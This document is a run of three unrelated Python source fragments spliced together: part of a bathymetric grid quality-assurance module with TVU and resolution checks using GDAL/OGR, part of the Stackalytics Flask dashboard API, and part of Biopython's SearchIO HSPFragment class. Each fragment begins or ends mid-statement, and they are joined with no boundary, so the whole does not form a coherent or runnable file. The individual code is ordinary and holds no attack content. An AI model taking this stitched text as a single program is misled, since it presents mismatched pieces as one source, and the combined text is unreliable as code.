jobs=",".join([j.batch_job_id for j in jobs]), format="JobID,State,ExitCode,Submit,Start,End,NodeList",
make them more obvious. We've already # calculated the pass/fail stats so this won't impact results. failed_uncertainty_int8_grow = self._grow_pixels( failed_uncertainty_int8, self.pixel_growth) # simplify distance is calculated as the distance pixels are grown out # `ifd.geotransform[1]` is pixel size simplify_distance = self.pixel_growth * ifd.geotransform[1] tile_ds = gdal.GetDriverByName('MEM').Create( '', tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Float32 ) tile_ds.SetGeoTransform(tile_affine.to_gdal()) tile_band = tile_ds.GetRasterBand(1) tile_band.WriteArray(allowable_uncertainty, 0, 0) tile_band.SetNoDataValue(0) tile_band.FlushCache() tile_ds.SetProjection(ifd.projection) tile_failed_ds = gdal.GetDriverByName('MEM').Create( '', tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Byte ) tile_failed_ds.SetGeoTransform(tile_affine.to_gdal()) tile_failed_band = tile_failed_ds.GetRasterBand(1) tile_failed_band.WriteArray(failed_uncertainty_int8_grow, 0, 0) tile_failed_band.SetNoDataValue(0) tile_failed_band.FlushCache() tile_failed_ds.SetProjection(ifd.projection) ogr_driver = ogr.GetDriverByName('Memory') ogr_dataset = ogr_driver.CreateDataSource('shapemask') ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs) # used the input raster data 'tile_band' as the input and mask, if not # used as a mask then a feature that outlines the entire dataset is # also produced gdal.Polygonize( tile_failed_band, tile_failed_band, ogr_layer, -1, [], callback=None ) ogr_simple_driver = ogr.GetDriverByName('Memory') ogr_simple_dataset = ogr_simple_driver.CreateDataSource( 'failed_poly') ogr_simple_layer = ogr_simple_dataset.CreateLayer( 'failed_poly', srs=None) self._simplify_layer( ogr_layer, ogr_simple_layer, simplify_distance) ogr_srs_out = osr.SpatialReference() ogr_srs_out.ImportFromEPSG(4326) transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out) for feature in ogr_simple_layer: # transform feature into epsg:4326 before export to geojson transformed = feature.GetGeometryRef() transformed.Transform(transform) geojson_feature = geojson.loads(feature.ExportToJson()) self.tiles_geojson.coordinates.extend( geojson_feature.geometry.coordinates ) ogr_simple_dataset.Destroy() ogr_dataset.Destroy() if self.spatial_export: au = self._get_tmp_file('allowable_uncertainty', 'tif', tile) tile_ds = gdal.GetDriverByName('GTiff').Create( au, tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Float32, options=['COMPRESS=DEFLATE'] ) tile_ds.SetGeoTransform(tile_affine.to_gdal()) tile_band = tile_ds.GetRasterBand(1) tile_band.WriteArray(allowable_uncertainty, 0, 0) tile_band.SetNoDataValue(0) tile_band.FlushCache() tile_ds.SetProjection(ifd.projection) tf = self._get_tmp_file('failed_uncertainty', 'tif', tile) tile_failed_ds = gdal.GetDriverByName('GTiff').Create( tf, tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'] ) tile_failed_ds.SetGeoTransform(tile_affine.to_gdal()) tile_failed_band = tile_failed_ds.GetRasterBand(1) tile_failed_band.WriteArray(failed_uncertainty_int8, 0, 0) tile_failed_band.SetNoDataValue(0) tile_failed_band.FlushCache() tile_failed_ds.SetProjection(ifd.projection) sf = self._get_tmp_file('failed_uncertainty', 'shp', tile) ogr_driver = ogr.GetDriverByName("ESRI Shapefile") ogr_dataset = ogr_driver.CreateDataSource(sf) ogr_layer = ogr_dataset.CreateLayer( 'failed_uncertainty', srs=ogr_srs) # used the input raster data 'tile_band' as the input and mask, if not # used as a mask then a feature that outlines the entire dataset is # also produced gdal.Polygonize( tile_failed_band, tile_failed_band, ogr_layer, -1, [], callback=None ) tile_ds = None tile_failed_ds = None ogr_dataset.Destroy() self._move_tmp_dir() def get_outputs(self) -> QajsonOutputs: execution = QajsonExecution( start=self.start_time, end=self.end_time, status=self.execution_status, error=self.error_message ) data = { "failed_cell_count": self.failed_cell_count, "total_cell_count": self.total_cell_count, "fraction_failed": self.failed_cell_count / self.total_cell_count, } if self.spatial_qajson: data['map'] = self.tiles_geojson if self.failed_cell_count > 0: percent_failed = ( self.failed_cell_count / self.total_cell_count * 100 ) msg = ( f"{self.failed_cell_count} nodes failed the TVU check this " f"represents {percent_failed:.1f}% of all nodes within data." ) return QajsonOutputs( execution=execution, files=None, count=None, percentage=None, messages=[msg], data=data, check_state=GridCheckState.cs_fail ) else: return QajsonOutputs( execution=execution, files=None, count=None, percentage=None, messages=[], data=data, check_state=GridCheckState.cs_pass ) class ResolutionCheck(GridCheck): ''' Determines what areas of the grid satisfy a resolution check. The check first calculates a feature detection size (fds) on a per pixel basis, two values for this are calculated above and below a threshold depth. In both cases the fds value is calculated from the pixels depth and linear equation parameters provided as input parameters to this check. eg; fds = Depth Multiplier * depth + Depth Constant This equation is calculated using different a different Depth Multiplier and Depth Constant depending on whether the depth at that location is above of below the threshold. Once fds has been calculated per pixel a boolean check is performed to find pixels where the grid resolution is lower than the fds * feature detection multiplier. If any pixel is false, then the QA check fails. ''' id = 'c73119ea-4f79-4001-86e3-11c4cbaaeb2d' name = 'Resolution Check' version = '1' # default values taken from IHO - 1a spec input_params = [ QajsonParam("Feature Detection Size Multiplier", 0.5), QajsonParam("Threshold Depth", 40.0), QajsonParam("Above Threshold FDS Depth Multiplier", 0.0), QajsonParam("Above Threshold FDS Depth Constant", 2.0), QajsonParam("Below Threshold FDS Depth Multiplier", 0.05), QajsonParam("Below Threshold FDS Depth Constant", 0.0) ] def __init__(self, input_params: List[QajsonParam]): super().__init__(input_params) self._fds_multiplier = self.get_param( 'Feature Detection Size Multiplier') self._threshold_depth = self.get_param( 'Threshold Depth') self._a_fds_depth_multiplier = self.get_param( 'Above Threshold FDS Depth Multiplier') self._a_fds_depth_constant = self.get_param( 'Above Threshold FDS Depth Constant') self._b_fds_depth_multiplier = self.get_param( 'Below Threshold FDS Depth Multiplier') self._b_fds_depth_constant = self.get_param( 'Below Threshold FDS Depth Constant') self.tiles_geojson = MultiPolygon() # amount of padding to place around failing pixels # this simplifies the geometry, and enlarges the failing area that # will allow it to be shown in the UI more easily self.pixel_growth = 5 def merge_results(self, last_check: GridCheck): self.start_time = last_check.start_time self.total_cell_count += last_check.total_cell_count self.failed_cell_count += last_check.failed_cell_count self.tiles_geojson.coordinates.extend( last_check.tiles_geojson.coordinates ) self._merge_temp_dirs(last_check) def run( self, ifd: InputFileDetails, tile: Tile, depth, density, uncertainty, progress_callback=None): # run check on tile data self.grid_resolution = ifd.geotransform[1] # count of all cells/nodes/pixels that are not NaN in the uncertainty # array self.total_cell_count = int(depth.count()) # skip processing this chunk of data if it contains only nodata if self.total_cell_count == 0: self.failed_cell_count = 0 return abs_depth = np.abs(depth) abs_threshold_depth = abs(self._threshold_depth) # refer to docs at top of class defn, this is described there fds = np.piecewise( abs_depth, [ abs_depth < abs_threshold_depth, abs_depth >= abs_threshold_depth ], [ lambda d: self._a_fds_depth_multiplier * d + self._a_fds_depth_constant, lambda d: self._b_fds_depth_multiplier * d + self._b_fds_depth_constant ] ) fds = np.ma.masked_where(np.ma.getmask(depth), fds) allowable_grid_size = fds * self._fds_multiplier # The idea of the standard here is that the deeper the water gets the # less ability you have to pick up features on the seafloor and also # features become less important the deeper the water gets as under # keel clearance for ships becomes less of an issue. failed_resolution = allowable_grid_size < self.grid_resolution failed_resolution.fill_value = False failed_resolution = failed_resolution.filled() failed_resolution_int8 = failed_resolution.astype(np.int8) # count of cells that failed the check self.failed_cell_count = int(failed_resolution.sum()) if not (self.spatial_export or self.spatial_export_location): # if we don't generate spatial outputs, then there's no # need to do any further processing return src_affine = Affine.from_gdal(*ifd.geotransform) tile_affine = src_affine * Affine.translation( tile.min_x, tile.min_y ) ogr_srs = osr.SpatialReference() ogr_srs.ImportFromWkt(ifd.projection) # see notes on density check for more details on the processing performed # below if self.spatial_qajson: # grow out failed pixels to make them more obvious. We've already # calculated the pass/fail stats so this won't impact results. failed_resolution_int8_grow = self._grow_pixels( failed_resolution_int8, self.pixel_growth) # simplify distance is calculated as the distance pixels are grown out # `ifd.geotransform[1]` is pixel size simplify_distance = self.pixel_growth * ifd.geotransform[1] tile_failed_ds = gdal.GetDriverByName('MEM').Create( '', tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Byte ) tile_failed_ds.SetGeoTransform(tile_affine.to_gdal()) tile_failed_band = tile_failed_ds.GetRasterBand(1) tile_failed_band.WriteArray(failed_resolution_int8_grow, 0, 0) tile_failed_band.SetNoDataValue(0) tile_failed_band.FlushCache() tile_failed_ds.SetProjection(ifd.projection) ogr_driver = ogr.GetDriverByName('Memory') ogr_dataset = ogr_driver.CreateDataSource('shapemask') ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs) # used the input raster data 'tile_band' as the input and mask, if not # used as a mask then a feature that outlines the entire dataset is # also produced gdal.Polygonize( tile_failed_band, tile_failed_band, ogr_layer, -1, [], callback=None ) ogr_simple_driver = ogr.GetDriverByName('Memory') ogr_simple_dataset = ogr_simple_driver.CreateDataSource( 'failed_poly') ogr_simple_layer = ogr_simple_dataset.CreateLayer( 'failed_poly', srs=None) self._simplify_layer( ogr_layer, ogr_simple_layer, simplify_distance) ogr_srs_out = osr.SpatialReference() ogr_srs_out.ImportFromEPSG(4326) transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out) for feature in ogr_simple_layer: # transform feature into epsg:4326 before export to geojson transformed = feature.GetGeometryRef() transformed.Transform(transform) geojson_feature = geojson.loads(feature.ExportToJson()) self.tiles_geojson.coordinates.extend( geojson_feature.geometry.coordinates ) ogr_simple_dataset.Destroy() ogr_dataset.Destroy() if self.spatial_export: allowable_grid_size.fill_value = -9999.0 allowable_grid_size = allowable_grid_size.filled() ar = self._get_tmp_file('allowable_resolution', 'tif', tile) tile_ds = gdal.GetDriverByName('GTiff').Create( ar, tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Float32, options=['COMPRESS=DEFLATE'] ) tile_ds.SetGeoTransform(tile_affine.to_gdal()) tile_band = tile_ds.GetRasterBand(1) tile_band.WriteArray(allowable_grid_size, 0, 0) tile_band.SetNoDataValue(-9999.0) tile_band.FlushCache() tile_ds.SetProjection(ifd.projection) tf = self._get_tmp_file('failed_resolution', 'tif', tile) tile_failed_ds = gdal.GetDriverByName('GTiff').Create( tf, tile.max_x - tile.min_x, tile.max_y - tile.min_y, 1, gdal.GDT_Byte, options=['COMPRESS=DEFLATE'] ) tile_failed_ds.SetGeoTransform(tile_affine.to_gdal()) tile_failed_band = tile_failed_ds.GetRasterBand(1) tile_failed_band.WriteArray(failed_resolution_int8, 0, 0) tile_failed_band.SetNoDataValue(0) tile_failed_band.FlushCache() tile_failed_ds.SetProjection(ifd.projection) sf = self._get_tmp_file('failed_resolution', 'shp', tile) ogr_driver = ogr.GetDriverByName("ESRI Shapefile") ogr_dataset = ogr_driver.CreateDataSource(sf) ogr_layer = ogr_dataset.CreateLayer( 'failed_resolution', srs=ogr_srs) # used the input raster data 'tile_band' as the input and mask, if not # used as a mask then a feature that outlines the entire dataset is # also produced gdal.Polygonize( tile_failed_band, tile_failed_band, ogr_layer, -1, [], callback=None ) tile_ds = None tile_failed_ds = None ogr_dataset.Destroy() self._move_tmp_dir() def get_outputs(self) -> QajsonOutputs: execution = QajsonExecution( start=self.start_time, end=self.end_time, status=self.execution_status, error=self.error_message ) data = { "failed_cell_count": self.failed_cell_count, "total_cell_count": self.total_cell_count, "fraction_failed": self.failed_cell_count / self.total_cell_count, "grid_resolution": self.grid_resolution } if self.spatial_qajson: data['map'] = self.tiles_geojson if self.failed_cell_count > 0: percent_failed = ( self.failed_cell_count / self.total_cell_count * 100 ) msg =
<gh_stars>0 # Copyright (c) 2013 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import operator import os import time import flask from oslo_config import cfg from oslo_log import log as logging import six from stackalytics.dashboard import config from stackalytics.dashboard import decorators from stackalytics.dashboard import helpers from stackalytics.dashboard import kpi from stackalytics.dashboard import parameters from stackalytics.dashboard import reports from stackalytics.dashboard import vault from stackalytics.processor import config as processor_cfg from stackalytics.processor import utils # Application objects --------- app = flask.Flask(__name__) app.config.from_object(__name__) app.config.from_envvar('DASHBOARD_CONF', silent=True) app.register_blueprint(reports.blueprint) app.register_blueprint(kpi.blueprint) LOG = logging.getLogger(__name__) CONF = cfg.CONF CONF.register_opts(processor_cfg.CONNECTION_OPTS + config.DASHBOARD_OPTS) # Handlers --------- @app.route('/') @decorators.templated() def overview(): pass @app.route('/cncf') @decorators.templated() def cncf(): pass @app.route('/unaffiliated') @decorators.templated() def unaffiliated(): pass @app.route('/widget') def widget(): return flask.render_template('widget.html') # AJAX Handlers --------- def _get_aggregated_stats(records, metric_filter, keys, param_id, param_title=None, finalize_handler=None): param_title = param_title or param_id result = dict((c, {'metric': 0, 'id': c}) for c in keys) context = {'vault': vault.get_vault()} if metric_filter: for record in records: metric_filter(result, record, param_id, context) result[getattr(record, param_id)]['name'] = ( getattr(record, param_title)) else: for record in records: record_param_id = getattr(record, param_id) result[record_param_id]['metric'] += 1 result[record_param_id]['name'] = getattr(record, param_title) response = [r for r in result.values() if r['metric']] if finalize_handler: response = [item for item in map(finalize_handler, response) if item] response.sort(key=lambda x: x['metric'], reverse=True) utils.add_index(response, item_filter=lambda x: x['id'] != '*independent') return response @app.route('/api/1.0/new_companies') @decorators.exception_handler() @decorators.response() @decorators.jsonify('stats') @decorators.record_filter(ignore=['start_date']) def get_new_companies(records, **kwargs): days = int(flask.request.args.get('days') or reports.DEFAULT_DAYS_COUNT) start_date = int(time.time()) - days * 24 * 60 * 60 result = {} for record in records: company_name = record.company_name date = record.date if company_name not in result or result[company_name] > date: result[company_name] = date response = list(({'name': company_name, 'date': result[company_name], 'date_str': helpers.format_date(result[company_name])}) for company_name in result if result[company_name] >= start_date) response.sort(key=lambda x: x['date'], reverse=True) utils.add_index(response) return response @app.route('/api/1.0/stats/companies') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter() @decorators.aggregate_filter() def get_companies(records, metric_filter, finalize_handler, **kwargs): return _get_aggregated_stats(records, metric_filter, vault.get_memory_storage().get_companies(), 'company_name', finalize_handler=finalize_handler) @app.route('/api/1.0/stats/modules') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter() @decorators.aggregate_filter() def get_modules(records, metric_filter, finalize_handler, **kwargs): return _get_aggregated_stats(records, metric_filter, vault.get_memory_storage().get_modules(), 'module', finalize_handler=finalize_handler) def get_core_engineer_branch(user, modules): is_core = None for (module, branch) in (user.get('core') or []): if module in modules: is_core = branch if branch == 'master': # master is preferable, but stables are ok break return is_core @app.route('/api/1.0/stats/engineers') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter() @decorators.aggregate_filter() def get_engineers(records, metric_filter, finalize_handler, **kwargs): modules_names = parameters.get_parameter(kwargs, 'module') modules = set([m for m, r in vault.resolve_modules(modules_names, [''])]) def postprocessing(record): if finalize_handler: record = finalize_handler(record) user = vault.get_user_from_runtime_storage(record['id']) record['core'] = get_core_engineer_branch(user, modules) return record return _get_aggregated_stats(records, metric_filter, vault.get_memory_storage().get_user_ids(), 'user_id', 'author_name', finalize_handler=postprocessing) @app.route('/api/1.0/stats/engineers_extended') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['metric']) @decorators.jsonify('stats') @decorators.record_filter(ignore=['metric']) def get_engineers_extended(records, **kwargs): modules_names = parameters.get_parameter(kwargs, 'module') modules = set([m for m, r in vault.resolve_modules(modules_names, [''])]) def postprocessing(record): record = decorators.mark_finalize(record) if not (record['mark'] or record['review'] or record['commit'] or record['email'] or record['patch']): return user = vault.get_user_from_runtime_storage(record['id']) record['company'] = helpers.get_current_company(user) record['core'] = get_core_engineer_branch(user, modules) return record def record_processing(result, record, param_id): result_row = result[getattr(record, param_id)] record_type = record.record_type result_row[record_type] = result_row.get(record_type, 0) + 1 if record_type == 'mark': decorators.mark_filter(result, record, param_id, {}) result = {} for record in records: user_id = record.user_id if user_id not in result: result[user_id] = {'id': user_id, 'mark': 0, 'review': 0, 'commit': 0, 'email': 0, 'patch': 0, 'metric': 0} record_processing(result, record, 'user_id') result[user_id]['name'] = record.author_name response = result.values() response = [item for item in map(postprocessing, response) if item] response.sort(key=lambda x: x['metric'], reverse=True) utils.add_index(response) return response @app.route('/api/1.0/stats/distinct_engineers') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter() def get_distinct_engineers(records, **kwargs): result = {} for record in records: result[record.user_id] = { 'author_name': record.author_name, 'author_email': record.author_email, } return result @app.route('/api/1.0/activity') @decorators.exception_handler() @decorators.response() @decorators.jsonify('activity') @decorators.record_filter() def get_activity_json(records, **kwargs): start_record = int(flask.request.args.get('start_record') or 0) page_size = int(flask.request.args.get('page_size') or parameters.DEFAULT_RECORDS_LIMIT) query_message = flask.request.args.get('query_message') return helpers.get_activity(records, start_record, page_size, query_message) @app.route('/api/1.0/contribution') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['metric']) @decorators.jsonify('contribution') @decorators.record_filter(ignore=['metric']) def get_contribution_json(records, **kwargs): return helpers.get_contribution_summary(records) @app.route('/api/1.0/companies') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['company']) @decorators.jsonify() @decorators.record_filter(ignore=['company']) def get_companies_json(record_ids, **kwargs): memory_storage = vault.get_memory_storage() companies = set(company for company in memory_storage.get_index_keys_by_record_ids( 'company_name', record_ids)) if kwargs['_params']['company']: companies.add(memory_storage.get_original_company_name( kwargs['_params']['company'][0])) return [{'id': c.lower().replace('&', ''), 'text': c} for c in sorted(companies)] @app.route('/api/1.0/modules') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['module']) @decorators.jsonify() @decorators.record_filter(ignore=['module']) def get_modules_json(record_ids, **kwargs): module_id_index = vault.get_vault()['module_id_index'] tags = parameters.get_parameter(kwargs, 'tag', plural_name='tags') # all modules mentioned in records module_ids = vault.get_memory_storage().get_index_keys_by_record_ids( 'module', record_ids) add_modules = set([]) for module in six.itervalues(module_id_index): if set(module['modules']) & module_ids: add_modules.add(module['id']) module_ids |= add_modules # keep only modules with specified tags if tags: module_ids = set(module_id for module_id in module_ids if ((module_id in module_id_index) and (module_id_index[module_id].get('tag') in tags))) result = [] for module_id in module_ids: module = module_id_index[module_id] result.append({'id': module['id'], 'text': module['module_group_name'], 'tag': module['tag']}) return sorted(result, key=operator.itemgetter('text')) @app.route('/api/1.0/companies/<company_name>') @decorators.response() @decorators.cached() @decorators.jsonify('company') def get_company(company_name, **kwargs): memory_storage_inst = vault.get_memory_storage() for company in memory_storage_inst.get_companies(): if company.lower() == company_name.lower(): return { 'id': company_name, 'text': memory_storage_inst.get_original_company_name( company_name) } flask.abort(404) @app.route('/api/1.0/modules/<module_id>') @decorators.response() @decorators.cached() @decorators.jsonify('module') def get_module(module_id, **kwargs): project_type = parameters.get_single_parameter(kwargs, 'project_type') release = parameters.get_single_parameter(kwargs, 'release') module = helpers.extend_module(module_id, project_type, release) if not module: flask.abort(404) return module @app.route('/api/1.0/members') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['release', 'project_type', 'module']) @decorators.jsonify('members') @decorators.record_filter(ignore=['release', 'project_type', 'module']) def get_members(records, **kwargs): response = [] for record in records: record = vault.extend_record(record) nr = dict([(k, record[k]) for k in ['author_name', 'date', 'company_name', 'member_uri']]) nr['date_str'] = helpers.format_date(nr['date']) response.append(nr) response.sort(key=lambda x: x['date'], reverse=True) utils.add_index(response) return response @app.route('/api/1.0/stats/bp') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter() def get_bpd(records, **kwargs): result = [] for record in records: if record.record_type in ['bpd', 'bpc']: record = vault.extend_record(record) mention_date = record.get('mention_date') if mention_date: date = helpers.format_date(mention_date) else: date = 'never' result.append({ 'date': date, 'status': record['lifecycle_status'], 'metric': record.get('mention_count') or 0, 'id': record['name'], 'name': record['name'], 'link': helpers.make_blueprint_link(record['module'], record['name']) }) result.sort(key=lambda x: x['metric'], reverse=True) utils.add_index(result) return result @app.route('/api/1.0/languages') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['language']) @decorators.jsonify() @decorators.record_filter(ignore=['language']) def get_languages_json(record_ids, **kwargs): memory_storage = vault.get_memory_storage() languages = set(r.value for r in memory_storage.get_records(record_ids)) return [{'id': c.lower().replace('&', ''), 'text': c} for c in sorted(languages)] @app.route('/api/1.0/stats/languages') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('stats') @decorators.record_filter(ignore=['language']) def get_languages(records, **kwargs): result = [] languages = collections.defaultdict(int) for record in records: if record.record_type in ['tr']: languages[record.value] += record.loc for lang, val in six.iteritems(languages): result.append({ 'id': lang, 'name': lang, 'metric': val, }) result.sort(key=lambda x: x['metric'], reverse=True) utils.add_index(result) return result @app.route('/api/1.0/users') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=['user_id']) @decorators.jsonify() @decorators.record_filter(ignore=['user_id']) def get_users_json(record_ids, **kwargs): core_in = parameters.get_single_parameter(kwargs, 'core_in') or None valid_modules = set() if core_in: core_in = set(core_in.split(',')) valid_modules = vault.resolve_project_types( kwargs['_params']['project_type']) valid_modules = set(m[0] for m in vault.resolve_modules( valid_modules, kwargs['_params']['release'])) user_ids = vault.get_memory_storage().get_index_keys_by_record_ids( 'user_id', record_ids) if kwargs['_params']['user_id']: user_ids.add(kwargs['_params']['user_id'][0]) result = [] for user_id in user_ids: user = vault.get_user_from_runtime_storage(user_id) r = {'id': user_id, 'text': user.get('user_name') or user['user_id']} add_flag = not core_in if core_in and user.get('core'): core_modules = [module_branch[0] for module_branch in user['core'] if (module_branch[1] in core_in and module_branch[0] in valid_modules)] if core_modules: r['core'] = core_modules if user['companies']: r['company_name'] = helpers.get_current_company(user) add_flag = True if add_flag: result.append(r) result.sort(key=lambda x: x['text']) return result @app.route('/api/1.0/users/<user_id>') @decorators.response() @decorators.jsonify('user') def get_user(user_id): user = vault.get_user_from_runtime_storage(user_id) if not user: flask.abort(404) user = helpers.extend_user(user) return user @app.route('/api/1.0/releases') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=parameters.FILTER_PARAMETERS) @decorators.jsonify(root=('data', 'default')) def get_releases_json(**kwargs): releases = [{'id': release['release_name'], 'text': release['release_name'].capitalize(), 'project': release.get('project')} for release in vault.get_vault()['releases'].values()] releases.append({'id': 'all', 'text': 'All'}) releases.reverse() return (releases, parameters.get_default('release')) @app.route('/api/1.0/metrics') @decorators.exception_handler() @decorators.response() @decorators.cached(ignore=parameters.FILTER_PARAMETERS) @decorators.jsonify(root=('data', 'default')) def get_metrics_json(**kwargs): return (sorted([{'id': m, 'text': t} for m, t in six.iteritems(parameters.METRIC_LABELS)], key=operator.itemgetter('text')), parameters.get_default('metric')) @app.route('/api/1.0/project_types') @decorators.response() @decorators.exception_handler() @decorators.cached(ignore=parameters.FILTER_PARAMETERS) @decorators.jsonify(root=('data', 'default')) def get_project_types_json(**kwargs): return ([{'id': pt['id'], 'text': pt['title'], 'child': pt.get('child', False)} for pt in vault.get_project_types()], parameters.get_default('project_type')) @app.route('/api/1.0/affiliation_changes') @decorators.exception_handler() @decorators.response() @decorators.jsonify('affiliation_changes') def get_company_changes(**kwargs): start_days = str(flask.request.args.get('start_days') or utils.timestamp_to_date(int(time.time()) - 365 * 24 * 60 * 60)) end_days = str(flask.request.args.get('end_days') or utils.timestamp_to_date(int(time.time()))) start_date = utils.date_to_timestamp_ext(start_days) end_date = utils.date_to_timestamp_ext(end_days) runtime_storage = vault.get_runtime_storage() result = [] for user in runtime_storage.get_all_users(): companies = user.get('companies') or [] if len(companies) < 2: continue companies_iter = iter(companies) company = companies_iter.next() old_company_name = company['company_name'] date = company['end_date'] for company in companies_iter: new_company_name = company['company_name'] if start_date <= date <= end_date: result.append({ 'user_id': user['user_id'], 'user_name': user['user_name'], 'old_company_name': old_company_name, 'new_company_name': new_company_name, 'date': date, }) old_company_name = new_company_name date = company['end_date'] return result def _get_week(kwargs, param_name): date_param = parameters.get_single_parameter(kwargs, param_name) if date_param: ts = utils.date_to_timestamp_ext(date_param) else: ts = vault.get_vault()[param_name] return utils.timestamp_to_week(ts) @app.route('/api/1.0/stats/timeline') @decorators.exception_handler() @decorators.response() @decorators.cached() @decorators.jsonify('timeline') @decorators.record_filter(ignore=['release', 'start_date']) def timeline(records, **kwargs): # find start and end dates metric = parameters.get_parameter(kwargs, 'metric') start_date = int(parameters.get_single_parameter(kwargs, 'start_date') or 0) release_name = parameters.get_single_parameter(kwargs, 'release') or 'all' releases = vault.get_vault()['releases'] if 'all' in release_name: start_week = release_start_week = _get_week(kwargs, 'start_date') end_week = release_end_week = _get_week(kwargs, 'end_date') else: release = releases[release_name] start_week = release_start_week = utils.timestamp_to_week( release['start_date']) end_week = release_end_week = utils.timestamp_to_week( release['end_date']) now = utils.timestamp_to_week(int(time.time())) + 1 # expand start-end to year if needed if release_end_week - release_start_week < 52: expansion = (52 - (release_end_week - release_start_week)) // 2 if release_end_week + expansion < now: end_week += expansion else: end_week = now start_week = end_week - 52 # empty stats for all weeks in range weeks = range(start_week, end_week) week_stat_loc = dict((c, 0) for c in weeks) week_stat_commits = dict((c, 0) for c in weeks) week_stat_commits_hl =
= allitems('hit_end', doc="""List of all fragments' hit end coordinates""") query_end_all = allitems('query_end', doc="""List of all fragments' query end coordinates""") hit_span_all = allitems('hit_span', doc="""List of all fragments' hit sequence size""") query_span_all = allitems('query_span', doc="""List of all fragments' query sequence size""") hit_range_all = allitems('hit_range', doc="""List of all fragments' hit start and end coordinates""") query_range_all = allitems('query_range', doc="""List of all fragments' query start and end coordinates""") class HSPFragment(_BaseHSP): """Class representing a contiguous alignment of hit-query sequence. HSPFragment forms the core of any parsed search output file. Depending on the search output file format, it may contain the actual query and/or hit sequences that produces the search hits. These sequences are stored as SeqRecord objects (see SeqRecord): >>> from Bio import SearchIO >>> qresult = next(SearchIO.parse('Blast/mirna.xml', 'blast-xml')) >>> fragment = qresult[0][0][0] # first hit, first hsp, first fragment >>> print(fragment) Query: 33211 mir_1 Hit: gi|262205317|ref|NR_030195.1| Homo sapiens microRNA 520b (MIR520... Query range: [0:61] (1) Hit range: [0:61] (1) Fragments: 1 (61 columns) Query - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| Hit - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG # the query sequence is a SeqRecord object >>> fragment.query.__class__ <class 'Bio.SeqRecord.SeqRecord'> >>> print(fragment.query) ID: 33211 Name: aligned query sequence Description: mir_1 Number of features: 0 Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet()) # the hit sequence is a SeqRecord object as well >>> fragment.hit.__class__ <class 'Bio.SeqRecord.SeqRecord'> >>> print(fragment.hit) ID: gi|262205317|ref|NR_030195.1| Name: aligned hit sequence Description: Homo sapiens microRNA 520b (MIR520B), microRNA Number of features: 0 Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet()) # when both query and hit are present, we get a MultipleSeqAlignment object >>> fragment.aln.__class__ <class 'Bio.Align.MultipleSeqAlignment'> >>> print(fragment.aln) DNAAlphabet() alignment with 2 rows and 61 columns CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG 33211 CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG gi|262205317|ref|NR_030195.1| """ def __init__(self, hit_id='<unknown id>', query_id='<unknown id>', hit=None, query=None, alphabet=single_letter_alphabet): """Initialize the class.""" self._alphabet = alphabet self.aln_annotation = {} self._hit_id = hit_id self._query_id = query_id for seq_type in ('query', 'hit'): # query or hit attributes default attributes setattr(self, '_%s_description' % seq_type, '<unknown description>') setattr(self, '_%s_features' % seq_type, []) # query or hit attributes whose default attribute is None for attr in ('strand', 'frame', 'start', 'end'): setattr(self, '%s_%s' % (seq_type, attr), None) # self.query or self.hit if eval(seq_type): setattr(self, seq_type, eval(seq_type)) else: setattr(self, seq_type, None) def __repr__(self): info = "hit_id=%r, query_id=%r" % (self.hit_id, self.query_id) try: info += ", %i columns" % len(self) except AttributeError: pass return "%s(%s)" % (self.__class__.__name__, info) def __len__(self): return self.aln_span def __str__(self): return self._str_hsp_header() + '\n' + self._str_aln() def __getitem__(self, idx): if self.aln is not None: obj = self.__class__( hit_id=self.hit_id, query_id=self.query_id, alphabet=self.alphabet) # transfer query and hit attributes # let SeqRecord handle feature slicing, then retrieve the sliced # features into the sliced HSPFragment if self.query is not None: obj.query = self.query[idx] obj.query_features = obj.query.features if self.hit is not None: obj.hit = self.hit[idx] obj.hit_features = obj.hit.features # description, strand, frame for attr in ('description', 'strand', 'frame'): for seq_type in ('hit', 'query'): attr_name = '%s_%s' % (seq_type, 